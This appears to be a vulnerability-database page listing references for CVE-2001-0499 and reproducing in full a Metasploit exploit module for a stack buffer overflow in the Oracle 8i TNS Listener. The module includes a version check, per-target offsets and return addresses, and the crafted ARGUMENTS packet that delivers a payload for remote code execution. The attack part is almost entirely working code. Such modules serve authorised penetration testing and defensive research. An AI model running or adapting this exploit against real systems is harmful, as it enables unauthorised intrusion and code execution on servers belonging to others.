Lucene search
K

Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow

🗓️ 13 Jul 2009 03:50:18Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

Oracle 8i TNS Listener Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2001-0499
24 Nov 201000:00
circl
CVE
CVE-2001-0499
27 Jul 200104:00
cve
Cvelist
CVE-2001-0499
27 Jul 200104:00
cvelist
Exploit DB
Oracle 8i - TNS Listener &#039;ARGUMENTS&#039; Remote Buffer Overflow (Metasploit)
24 Nov 201000:00
exploitdb
NVD
CVE-2001-0499
21 Jul 200104:00
nvd
canvas
Immunity Canvas: ORACLE8LISTENER_WIN32
21 Jul 200104:00
canvas
Packet Storm
Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.
26 Nov 200900:00
packetstorm
CERT
Oracle 8i contains buffer overflow in TNS Listener
28 Jun 200100:00
cert
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::TNS

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Oracle 8i. When
        sending a specially crafted packet containing an overly long
        ARGUMENTS string to the TNS service, an attacker may be able
        to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-0499' ],
          [ 'OSVDB', '9427'],
          [ 'BID', '2941' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
          [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2001-06-28'))

    register_options([Opt::RPORT(1521)])
  end

  def check
    connect
    version = "(CONNECT_DATA=(COMMAND=VERSION))"
    pkt = tns_packet(version)
    sock.put(pkt)
    sock.get_once
    res = sock.get_once(-1, 1)
    disconnect

    if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

      buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
      buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
      buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)

      sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"

      pkt = tns_packet(sploit)

      print_status("Trying target #{target.name}...")
      sock.put(pkt)

      handler

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 210
EPSS0.85201
26